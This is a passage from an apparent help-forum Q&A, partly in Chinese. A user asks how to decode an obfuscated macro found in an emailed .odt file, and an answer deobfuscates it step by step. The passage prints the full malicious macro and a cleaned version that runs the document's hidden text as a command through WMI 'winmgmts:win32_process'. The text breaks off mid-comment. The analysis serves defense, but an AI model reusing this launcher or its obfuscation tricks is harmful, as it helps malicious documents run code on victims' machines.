如何从odt解密奇怪的宏?
How to decrypt strange macros from odt?
大家好,我在通过电子邮件发送的 odt 文件中找到了这个宏(以及其他两个类似的宏)。我知道这很危险,所以我在 linux 发行版的带有 libre office 的虚拟机中打开了它。
' LibreOffice Basic directive: run this module in VBA-compatibility mode so that the
' VBA syntax and library calls used below (e.g. VBA.Replace, CreateObject) are accepted.
Option VBASupport 1
' Obfuscated original of the junk-stripping helper. Only the lines reachable by
' following the GoTo chain ever run (marked "' live" below); every
' Dim / Open / Open / Open / Put / Close stanza between a GoTo and its target label is
' dead code. It would not even work if reached: the same file number is opened three
' times in a row, which raises a run-time error.
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
' live: HBYVV is always "", so prepending it changes nothing.
HBYVV = ""
' live: removes every "qq)(s2)(" token from the argument. W5ya1q1z48ltq3z_ is never
' assigned anywhere in the listing (an empty Variant), so the replacement text is "".
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
' Obfuscated original of the function that does the actual work; see
' S619csvpd1v4xzk5kc for the dead-code pattern. Reachable statements are marked
' "' live". Once the dead code and junk tokens are removed it reads the document text,
' builds the WMI moniker for Win32_Process and runs that text as a command line.
Function Tujor4m47ob()
' live: any run-time error is silently ignored from here on.
On Error Resume Next
' live: reads a story range of the document object (presumably the main text); the
' command line that ends up being executed is stored there, not in the macro.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
' live: this and the next three assignments are fragments of the WMI moniker, each
' padded with the junk token "qq)(s2)(" (decoded in the answer's collapsed version).
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
' live
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
' live
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
' live: the four named operands are never assigned in the listing, so this is
' ChrW(wdKeyS) — presumably the "s" of "winmgmts" (wdKeyS is a Word WdKey constant).
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
' live: concatenates the fragments in moniker order.
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
' live: strips the junk tokens, yielding the WMI moniker.
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
' live: binds to the WMI Win32_Process class (fails silently where COM/WMI is absent).
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
' live: drops the first four characters of the document text (the length argument
' is larger than needed and harmless).
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
' live: Win32_Process.Create runs the un-junked document text as a command line;
' Gge416y0ol9ajq and Z2vzndsnblr9xje7s are never assigned (empty arguments).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
' Obfuscated original of a thin wrapper: calls S619csvpd1v4xzk5kc on its argument with
' errors suppressed. Same dead-code pattern as above; reachable lines marked "' live".
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
' live
On Error Resume Next
GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
' live: plain copy of the argument.
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
' live: delegate to the junk-stripping helper.
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
' live
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function
我如何才能看到它的实际作用?这明明是加密的,但必须有办法解密,否则怎么能在任何机器上执行?
如果您注意,您会发现几乎每个 GoTo
都指向另一个 GoTo
而不是实际代码。您看到的大部分代码根本不会执行。即使执行到,它也会因错误而失败:它试图用同一个文件号接连打开几个不存在的文件,而这是不允许的。
您可以通过 GoTo
链轻松找到真正会执行的行,总共只有十几行。
识别出它们并删除仅存在以混淆反恶意软件的死代码后,您将得到三个相当短的函数:
' S619csvpd1v4xzk5kc with the dead code removed: the only work is a VBA.Replace that
' strips every "qq)(s2)(" junk token from the argument.
' HBYVV is always "" and W5ya1q1z48ltq3z_ is never assigned anywhere in the listing
' (an empty Variant), so the prefix and the replacement text both amount to "".
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function
' Tujor4m47ob with the dead code removed. This is the function that does the work:
' it reads the document text, assembles a WMI moniker from junk-padded fragments and
' runs the (un-junked) document text as a command line through Win32_Process.Create.
' On Error Resume Next hides every failure, so where COM/WMI is unavailable (e.g.
' LibreOffice on Linux) the macro simply does nothing visible.
Function Tujor4m47ob()
On Error Resume Next
' Story range of the document object (presumably the main text). The command line
' lives in the document body, not in the macro.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
' Moniker fragments, each padded with the junk token "qq)(s2)(" (see the collapsed
' version below for the folded literals).
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
' Kfo_8qx2w7l7x71, Hvsf68urunanusc, A08llnuiz59xyw7 and Pgjdd1yrw8qt are never
' assigned, so this is ChrW(wdKeyS) — presumably the "s" of "winmgmts".
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
' Fragments in moniker order, then the junk tokens are stripped.
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
' WMI Win32_Process class object.
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
' Drops the first four characters of the document text (length argument is oversized
' but harmless).
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
' Win32_Process.Create on the un-junked text; the last two arguments are never
' assigned (empty).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
' C0d4mc619_eaiuirzl with the dead code removed: a pass-through to
' S619csvpd1v4xzk5kc under On Error Resume Next (so a failure inside the helper
' leaves the result Empty instead of raising). The intermediate copies add nothing.
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
如果您随后将字符串文字折叠成一个并删除已知始终为空的虚假变量,您将得到:
' Same helper with the string literals folded: remove every "qq)(s2)(" junk token.
' The always-empty HBYVV and the never-assigned W5ya1q1z48ltq3z_ have been dropped.
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function
' Tujor4m47ob with literals folded and the always-empty variables removed.
' Stripping the junk token "qq)(s2)(" from the four fragments gives, in concatenation
' order: "winmgmt" + ChrW(wdKeyS) + ":win32_" + "p" + "rocess", i.e. the WMI moniker
' "winmgmts:win32_process" (wdKeyS presumably being the key code for "S").
Function Tujor4m47ob()
On Error Resume Next
' Document text; the command line is stored there, after a 4-character prefix.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(s2)(pqq)(s2)("
F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
Kz1yuitvz3qu6xai = ChrW(wdKeyS)
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
' WMI Win32_Process class object; fails silently where COM/WMI is unavailable.
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
' Runs the un-junked document text as a command line; the two trailing arguments
' are never assigned (empty).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
' Unchanged from the previous step: an error-suppressing pass-through to
' S619csvpd1v4xzk5kc. Nothing here depends on the folded literals.
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
现在您或许可以为这些函数指定适当的名称,并将混淆后的字符串替换为对它们进行去混淆后的结果:
' Strips every occurrence of the junk token "qq)(s2)(" that the macro sprinkles through
' its strings. Pure string helper, no side effects.
'   input_string: junk-padded text
'   returns:      input_string with all "qq)(s2)(" tokens removed
Function RemoveBogusQqFromString(input_string)
    Dim junkToken As String
    Dim cleaned As String
    junkToken = "qq)(s2)("
    cleaned = VBA.Replace(input_string, junkToken, "")
    RemoveBogusQqFromString = cleaned
End Function
' Error-suppressing front for RemoveBogusQqFromString (the original
' C0d4mc619_eaiuirzl). With On Error Resume Next a failure inside the helper leaves
' the result Empty instead of raising.
'   input_string: junk-padded text
'   returns:      the helper's result, or Empty if the helper failed
Function WrapperForRemoveBogusQqFromString(input_string)
    On Error Resume Next
    Dim cleaned
    cleaned = RemoveBogusQqFromString(input_string)
    WrapperForRemoveBogusQqFromString = cleaned
End Function
' The macro's entry point in readable form. It carries no payload of its own: the
' command line is read from the document text and merely un-junked here, so extracting
' the document body (minus its 4-character prefix) recovers what would be executed
' without running the macro.
Function StartProcess()
On Error Resume Next
' Story range of the document object (ThisDocument, presumably renamed).
ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
' WMI moniker for the Win32_Process class (assembled from fragments in the original).
' Where COM/WMI is unavailable (e.g. LibreOffice on Linux) this fails and, because of
' On Error Resume Next, the rest of the function silently does nothing.
Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
' Drop the first four characters; the remainder is the junk-padded command line.
ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
' Win32_Process.Create launches the command line via WMI. Detection note: a process
' started this way is typically parented by the WMI provider host rather than the
